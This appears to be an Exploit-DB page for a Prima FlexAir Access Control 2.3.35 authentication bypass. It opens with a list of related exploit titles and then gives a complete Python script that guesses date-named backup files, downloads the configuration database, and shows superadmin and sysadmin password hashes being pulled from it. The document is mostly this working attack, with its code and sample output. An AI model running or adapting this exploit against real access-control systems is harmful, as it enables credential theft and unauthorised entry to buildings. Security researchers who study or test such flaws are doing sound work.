c8181201fd
38 changes to exploits/shellcodes Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH) Wondershare Application Framework Service - _WsAppService_ Unquote Service Path eMerge E3 Access Controller 4.6.07 - Remote Code Execution eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) CBAS-Web 19.0.0 - Information Disclosure Prima FlexAir Access Control 2.3.38 - Remote Code Execution Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting eMerge E3 1.00-06 - Unauthenticated Directory Traversal eMerge E3 1.00-06 - Privilege Escalation eMerge E3 1.00-06 - Remote Code Execution eMerge E3 1.00-06 - Cross-Site Request Forgery Atlassian Confluence 6.15.1 - Directory Traversal eMerge E3 1.00-06 - Arbitrary File Upload eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting eMerge50P 5000P 4.6.07 - Remote Code Execution CBAS-Web 19.0.0 - Remote Code Execution CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) CBAS-Web 19.0.0 - Username Enumeration CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection Joomla 3.9.13 - 'Host' Header Injection Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting Prima Access Control 2.3.35 - Arbitrary File Upload Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit) Optergy 2.3.0a - Remote Code Execution FlexAir Access Control 2.4.9api3 - Remote Code Execution Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) Optergy 2.3.0a - Username Disclosure Optergy 2.3.0a - Remote Code Execution (Backdoor) Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting FlexAir Access Control 2.3.35 - Authentication Bypass Bematech Printer MP-4200 - Denial of Service
97 lines
No EOL
3.4 KiB
Python
Executable file
97 lines
No EOL
3.4 KiB
Python
Executable file
# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
|
|
# Google Dork: NA
|
|
# Date: 2019-11-11
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
|
|
# Software Link: https://www.computrols.com/building-automation-software/
|
|
# Version: 2.3.35
|
|
# Tested on: NA
|
|
# CVE : CVE-2019-7666, CVE-2019-7667
|
|
# Advisory: https://applied-risk.com/resources/ar-2019-007
|
|
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
|
|
|
|
#!/usr/bin/env python
|
|
# -*- coding: utf8 -*-
|
|
#
|
|
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
|
|
# Authentication Bypass (Login with MD5 hash)
|
|
#
|
|
# Older versions: /links/Nova_Config_2019-01-03.bck
|
|
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
|
|
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
|
|
# Fixed versions: 2.4
|
|
#
|
|
###################################################################################
|
|
#
|
|
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
|
|
# [+] Please wait while fetchin the backup config file...
|
|
# [+] Found some juice!
|
|
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
|
|
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
|
|
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
|
|
# SQLite version 3.22.0 2018-01-22 18:45:57
|
|
# Enter ".help" for usage hints.
|
|
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
|
|
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
|
|
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
|
|
# sqlite> .q
|
|
# lqwrm@metalgear:~/stuff/prima$
|
|
#
|
|
###################################################################################
|
|
#
|
|
# 11.01.2019
|
|
#
|
|
|
|
import os#######
|
|
import sys######
|
|
import time#####
|
|
import requests#
|
|
|
|
from datetime import timedelta, date
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
|
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
|
|
piton = os.path.basename(sys.argv[0])
|
|
|
|
if len(sys.argv) < 2:
|
|
print '[+] Usage: '+piton+' [target]'
|
|
print '[+] Target example 1: http://10.0.0.17:8080'
|
|
print '[+] Target example 2: https://primanova.tld\n'
|
|
sys.exit()
|
|
|
|
host = sys.argv[1]
|
|
|
|
def datum(start_date, end_date):
|
|
for n in range(int ((end_date - start_date).days)):
|
|
yield start_date + timedelta(n)
|
|
|
|
start_date = date(2017, 1, 1)
|
|
end_date = date(2019, 12, 30)
|
|
|
|
print '[+] Please wait while fetchin the backup config file...'
|
|
|
|
def spinning_cursor():
|
|
while True:
|
|
for cursor in '|/-\\':
|
|
yield cursor
|
|
|
|
spinner = spinning_cursor()
|
|
|
|
for mooshoo in datum(start_date, end_date):
|
|
sys.stdout.write(next(spinner))
|
|
sys.stdout.flush()
|
|
time.sleep(0.1)
|
|
sys.stdout.write('\b')
|
|
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
|
|
|
|
if (h.status_code) == 200:
|
|
print '[+] Found some juice!'
|
|
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
|
|
timestr = time.strftime('%H%M%S')
|
|
time.sleep(1)
|
|
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
|
|
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
|
|
sys.exit()
|
|
|
|
print '[-] No backup for you today. :(' |